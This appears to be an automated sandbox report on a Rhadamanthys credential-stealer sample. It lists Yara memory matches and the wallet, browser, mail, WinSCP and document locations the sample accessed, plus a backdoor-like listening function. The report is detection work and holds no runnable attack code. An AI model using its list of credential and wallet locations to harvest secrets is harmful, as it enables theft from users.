Source: Yara match File source: 0000000C.00000003.1639794446.0000022BF85FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.1646734442.0000022BF85FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.1663918695.0000022BF85FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Found many strings related to Crypto-Wallets (likely being stolen)
Source: OpenWith.exe, 0000000C.00000003.1676357664.0000022BF7A40000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %AppData%\Qtum-Electrum\config
Source: OpenWith.exe, 0000000C.00000003.1681881720.0000022BF7A06000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %AppData%\com.liberty.jaxx
Source: OpenWith.exe, 0000000C.00000003.1681881720.0000022BF7A06000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: passphrase.json
Source: OpenWith.exe, 0000000C.00000003.1681881720.0000022BF7A06000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %AppData%\Exodus
Source: OpenWith.exe, 0000000C.00000003.1681881720.0000022BF7A06000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %AppData%\Coinomi\Coinomi\wallets
Source: powershell.exe, 00000003.00000002.1609966642.00007FF887D30000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: sqlcolumnencryptionkeystoreprovider
Source: OpenWith.exe, 0000000C.00000003.1819351288.0000022BF7A41000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: })C:\Users\user\AppData\Roaming\Ledger Live
Tries to harvest and steal Bitcoin Wallet information
Source: C:\Windows\System32\OpenWith.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Bitcoin\Bitcoin-Qt Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core Jump to behavior
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Source: C:\Windows\System32\OpenWith.exe Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration\Security Jump to behavior
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sessions Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_model_metadata_store Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Network Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\c7615543-0de7-4eea-9862-59688b7f430d Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\PersistentOriginTrials Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDB Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\mpnpojknpmmopombnjdcgaaiekajbnjb Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\mpnpojknpmmopombnjdcgaaiekajbnjb\Icons Monochrome Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ghbmnnjooekpmoecnnnilnnbdlolhkhi Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons Maskable Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Cache\Cache_Data Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync App Settings Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SegmentInfoDB Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\Icons Maskable Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons Monochrome Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCache Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\wasm\index-dir Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\mpnpojknpmmopombnjdcgaaiekajbnjb\Icons Maskable Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons Maskable Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm\Icons Maskable Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag\Icons Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\js Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\WebStorage Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_hint_cache_store Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\wasm Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_db Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm\Icons Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dir Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\DawnCache Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag\Icons Maskable Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons Monochrome Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\GPUCache Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\Icons Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databases Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalDB Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\mpnpojknpmmopombnjdcgaaiekajbnjb\Icons Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\js\index-dir Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\Icons Monochrome Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Temp Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GPUCache Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Cache Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalStorageConfigDB Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\Files Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag\Icons Monochrome Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Session Storage Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_db Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm\Icons Monochrome Jump to behavior
Tries to steal Mail credentials (via file / registry access)
Source: C:\Windows\System32\OpenWith.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook Jump to behavior
Searches for user specific document files
Source: C:\Windows\System32\OpenWith.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Directory queried: C:\Users\user\Documents\FACWLRWHGG Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Directory queried: C:\Users\user\Documents\FENIVHOIKN Jump to behavior
Yara detected Credential Stealer
Source: Yara match File source: Process Memory Space: OpenWith.exe PID: 8144, type: MEMORYSTR

Remote Access Functionality
barindex
Yara detected RHADAMANTHYS Stealer
Source: Yara match File source: 0000000C.00000003.1719875612.0000022BF85FB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.1672317407.0000022BF85FB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.1659269474.0000022BF85FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.1636322926.0000022BF85FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.1664518031.0000022BF85FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000003.1611964049.000000001B570000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.1669570254.0000022BF85F6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.1635992929.0000022BF85FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.1527920288.000000001B790000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.1672698778.0000022BF85FB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.1657600437.0000022BF85FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.1670784258.0000022BF85F9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.1642274997.0000022BF85FC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.1649906387.0000022BF85FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.1641470345.0000022BF85FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.1665094576.0000022BF85FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.1718717890.0000022BF85FB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.1732851639.0000022BF85F9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.1637017086.0000022BF85FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.1673234389.0000022BF85FB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.1536321873.0000022BF57D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.1635336719.0000022BF85FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.1716617542.0000022BF85FB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.1669024902.0000022BF85FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.1734062423.0000022BF85FB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.1647188143.0000022BF85FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.1719239524.0000022BF85FB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.1643307727.0000022BF85FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.1645446937.0000022BF85FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.1661819733.0000022BF85FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.1671905824.0000022BF85FB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.1667796484.0000022BF85FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.1645979631.0000022BF85FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.1820192855.0000022BF85FA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.1640027793.0000022BF85FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.1720627050.0000022BF85FB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.1643999295.0000022BF85FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.1641144578.0000022BF85FC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.1663391572.0000022BF85FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.1639097496.0000022BF85FC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.1685422890.0000022BF85FB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.1677206150.0000022BF85F5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.1667329576.0000022BF85FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.1676927286.0000022BF85F1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.1684103225.0000022BF85FB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.1657379194.0000022BF85FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.1719572786.0000022BF85FB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.1681955679.0000022BF85FA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.1733626617.0000022BF85FB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.1662264222.0000022BF85FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.1633957814.000000001BC61000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.1669915466.0000022BF85F6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.1728712322.0000022BF85FB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.1664818861.0000022BF85FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.1668657426.0000022BF85FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.1644462147.0000022BF85FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.1718358632.0000022BF85FB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.1636694743.0000022BF85FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.1717013447.0000022BF85F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.1664199634.0000022BF85FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.1643580454.0000022BF85FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.1650284949.0000022BF85FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.1660904997.0000022BF85FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.1637756767.0000022BF85FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.1656922103.0000022BF85FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.1720226582.0000022BF85FB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.1633368508.0000022BF85FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.1666919810.0000022BF85FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.1634857555.0000022BF85FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.1638233166.0000022BF85FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.1729281119.0000022BF85F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.1672457326.0000022BF85FB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.1643036259.0000022BF85FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.1670609003.0000022BF85F4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.1717903072.0000022BF85FB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.1658624595.0000022BF85FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.1633368508.0000022BF8501000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.1656035942.0000022BF85FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.1561583400.000000001BF81000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.1717469357.0000022BF85F9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.1639794446.0000022BF85FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.1646734442.0000022BF85FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.1663918695.0000022BF85FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF717766860 bind,listen,WSAGetLastError,closesocket, 4_2_00007FF717766860
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF717766B50 bind,WSAGetLastError,closesocket, 4_2_00007FF717766B50
